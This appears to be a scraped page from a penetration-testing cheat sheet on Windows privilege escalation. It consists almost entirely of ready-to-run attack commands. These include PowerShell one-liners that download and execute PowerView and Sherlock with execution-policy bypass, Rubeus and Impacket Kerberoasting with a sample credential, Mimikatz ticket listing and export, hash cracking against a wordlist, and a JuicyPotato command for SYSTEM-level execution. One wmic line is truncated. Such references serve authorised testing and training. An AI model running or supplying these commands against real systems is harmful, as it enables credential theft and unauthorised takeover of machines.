02 Privileges Escalation
Basic
Kerberoast
Juicy Potato
Impersonating
1
# Rubeus
2
# PowerShellMafia
3
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
4
powershell.exe -c "Import-Module C:\Users\Public\PowerUp.ps1; Invoke-AllChecks"
5
powershell.exe -c "Import-Module C:\Users\Public\Get-System.ps1; Get-System"
6
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1'); Invoke-AllChecks -Command 'start powershell.exe'"
7
8
# Sherlock
9
https://github.com/rasta-mouse/Sherlock
10
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1'); Find-AllVulns -Command 'start powershell.exe'"
11
12
13
# Unquoted paths
14
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v
Copied!
1
.\.rubeus.exe kerberoast /creduser:ecorp\morph3 /credpassword:pass1234
2
3
# List available tickets
4
setspn.exe -t evil.corp -q */*
5
powershell.exe -exec bypass -c "Import-Module .\GetUserSPNs.ps1"
6
cscript.exe GetUserSPNs.ps1
7
8
# List cached tickets
9
Invoke-Mimikatz -Command '"kerberos::list"'
10
powershell.exe -c "klist"
11
powershell.exe -c "Import-Module C:\Users\Public\Invoke-Mimikatz.ps1; Invoke-Mimikatz -Command '"kerberos::list"'"
12
13
# Request tickets
14
Add-Type -AssemblyName System.IdentityModel
15
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"
16
17
# Requesting remotely
18
python GetUserSPNs.py -request ECORP/morph3:[email protected]
19
20
# Extract tickets
21
powershell.exe -c "Import-Module C:\Users\Public\Invoke-Kerberoast.ps1; Invoke-Kerberoast -OutputFormat Hashcat"
22
Invoke-Mimikatz -Command '"kerberos::list /export"'
23
24
# Crack Tickets
25
python tgsrepcrack.py /usr/share/wordlists/rockyou.txt ticket.kirbi
Copied!
1
https://github.com/ohpe/juicy-potato/releases #Pick one CLSID from here according to your system
2
https://github.com/ohpe/juicy-potato/tree/master/CLSID
3
4
Required tokens SeAssignPrimaryTokenPrivilege SeImpersonatePrivilege
5
6
C:\Windows\Temp\JuicyPotato.exe -p cmd.exe -a "/c whoami > C:\Users\Public\morph3.txt" -t * -l 1031 -c {d20a3293-3341-4ae8-9aaf-8e397cb63c34}
Copied!
Copy link